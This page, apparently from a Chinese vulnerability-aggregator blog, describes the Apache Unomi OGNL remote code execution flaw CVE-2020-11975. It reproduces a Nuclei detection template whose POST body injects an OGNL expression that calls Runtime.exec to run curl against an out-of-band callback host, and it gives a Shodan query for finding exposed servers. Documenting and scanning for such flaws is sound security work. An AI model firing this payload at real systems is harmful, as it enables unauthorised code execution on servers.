Apache Unomi Remote Code Execution Vulnerability

漏洞信息

漏洞名称: Apache Unomi Remote Code Execution Vulnerability

漏洞编号:

  • CVE: CVE-2020-11975

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: Apache Unomi是一个开源的客户数据平台(CDP),用于管理客户数据和个性化客户体验。它广泛应用于企业级服务中,帮助组织收集、统一和分析客户数据,以提供个性化的用户体验。该平台支持多种部署场景,包括云服务和本地部署,因其灵活性和强大的功能而受到许多企业的青睐。

该漏洞存在于Apache Unomi的条件功能中,允许使用OGNL(Object-Graph Navigation Language)脚本。OGNL脚本提供了调用JDK中静态Java类的可能性,这些类可以以运行Java进程的权限级别执行代码。攻击者可以利用这一点,通过构造恶意的OGNL表达式,实现远程代码执行(RCE)。漏洞的技术根源在于Apache Unomi未能对用户提供的OGNL脚本进行适当的输入验证和安全限制,导致攻击者可以注入并执行任意代码。

成功利用此漏洞的攻击者可以在服务器上以Java进程的权限执行任意代码,可能导致系统完全被控制。由于该漏洞不需要任何形式的身份验证即可被利用,且可以远程触发,因此其潜在的安全风险极高。攻击者可以利用此漏洞进行数据泄露、服务中断或进一步的系统入侵。此外,由于攻击过程可以自动化进行,这使得漏洞的利用门槛相对较低,增加了其在野利用的可能性。

产品厂商: Apache

产品名称: Unomi

搜索语法: http.title:”Apache Unomi” || “Apache Unomi”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/acb7b2003df1ac107b2e6beb3f6beb9e8107375b/http%2Fcves%2F2020%2FCVE-2020-11975.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79

id: CVE-2020-11975

info:
  name: Apache Unomi - Remote Code Execution
  author: Sourabh-Sahu
  severity: critical
  description: |
    Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, enabling attackers to execute arbitrary code.
  impact: |
    Successful exploitation allows an attacker to execute arbitrary code on the server with the privileges of the Java process, potentially leading to complete system compromise.
  remediation: |
    Update Apache Unomi to version 1.5.2 or later. Disable OGNL scripting in conditions if not required.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11975
    - https://xz.aliyun.com/news/8157
    - https://github.com/1135/unomi_exploit
    - https://unomi.apache.org/security/cve-2020-11975.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11975
    cwe-id: CWE-94
    epss-score: 0.97373
    epss-percentile: 0.99982
    cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: unomi
    shodan-query: 'http.title:"Apache Unomi" || "Apache Unomi"'
  tags: cve,cve2020,apache,unomi,rce,ognl,oast

http:
  - method: POST
    path:
      - "{{BaseURL}}/context.json"
    headers:
      Content-Type: application/json
    body: |
      {
        "personalizations":[
          {
            "id":"gender-test_anystr",
            "strategy":"matching-first",
            "strategyOptions":{
              "fallback":"var2"
            },
            "contents":[
              {
                "filters":[
                  {
                    "condition":{
                      "parameterValues":{
                        "propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
                        "comparisonOperator":"equals_anystr",
                        "propertyValue":"male_anystr"
                      },
                      "type":"profilePropertyCondition"
                    }
                  }
                ]
              }
            ]
          }
        ],
        "sessionId":"test-demo-session-id"
      }

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or


Github Poc
#projectdiscovery/nuclei-templates:github issues #命令执行
Apache Unomi Remote Code Execution Vulnerability
http://example.com/2025/07/23/github_3684130455/
作者
lianccc
发布于
2025年7月23日
许可协议